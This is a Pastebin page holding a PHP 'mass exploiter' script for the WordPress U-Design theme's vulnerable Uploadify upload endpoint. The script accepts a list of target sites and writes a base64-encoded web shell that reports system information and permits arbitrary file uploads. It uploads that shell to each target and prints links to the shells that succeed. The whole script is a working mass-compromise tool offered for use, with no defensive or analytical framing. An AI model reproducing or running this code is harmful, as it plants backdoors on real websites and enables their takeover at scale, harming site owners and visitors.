AgusSR

WordPress U-Design Themes Uploadify Mass Xploiter

Apr 24th, 2016
1,426
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <center>
  3. <form method="post" enctype="multipart/form-data">
  4. Shellname: <br><input type="text" name='filename' style='width: 500px;' height="10" value='indoxploit.php' required><br>
  5. Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
  6. <input type='submit' name='exp' value='Hajar!' style='width: 500px;'>
  7. </form>
  8. <?php
  9. // IndoXploit
  10. set_time_limit(0);
  11. error_reporting(0);
  12.  
  13. function buffer() {
  14.     ob_flush();
  15.     flush();
  16. }
  17. function curl($url, $payload) {
  18.     $ch = curl_init();
  19.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  20.           curl_setopt($ch, CURLOPT_URL, $url);
  21.           curl_setopt($ch, CURLOPT_POST, true);
  22.           curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  23.           curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  24.           curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  25.           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  26.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  27.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  28.           curl_setopt($ch, CURLOPT_HEADER, 0);
  29.           curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  30.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  31.     $res = curl_exec($ch);
  32.           curl_close($ch);
  33.     return $res;
  34. }
  35. function cek($url) {
  36.     $ch = curl_init();
  37.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  38.           curl_setopt($ch, CURLOPT_URL, $url);
  39.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  40.     $res = curl_exec($ch);
  41.           curl_close($ch);
  42.     return $res;
  43. }
  44. $file = htmlspecialchars($_POST['filename']);
  45. $site = explode("\r\n", $_POST['url']);
  46. $do = $_POST['exp'];
  47. $uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIFUtRGVzaWduIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
  48. if($do) {
  49.     $idx_dir = mkdir("indoxploit_tools", 0755);
  50.     $shell = "indoxploit_tools/".$file;
  51.     $fopen = fopen($shell, "w");
  52.     fwrite($fopen, $uploader);
  53.     fclose($fopen);
  54.     foreach($site as $url) {
  55.         $target = $url.'/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php';
  56.         $data = array(
  57.             "Filedata" => "@$shell"
  58.             );
  59.         $curl = curl($target, $data);
  60.         if($curl) {
  61.             $cek = cek($url.'/'.$file);
  62.             if(preg_match("/IndoXploit/i", $cek)) {
  63.                 echo "<a href='$url/$file' target='_blank'>$url/$file</a> -> shellmu<br>";
  64.             }
  65.         }
  66.     buffer();
  67.     }
  68. }
  69. ?>
RAW Paste Data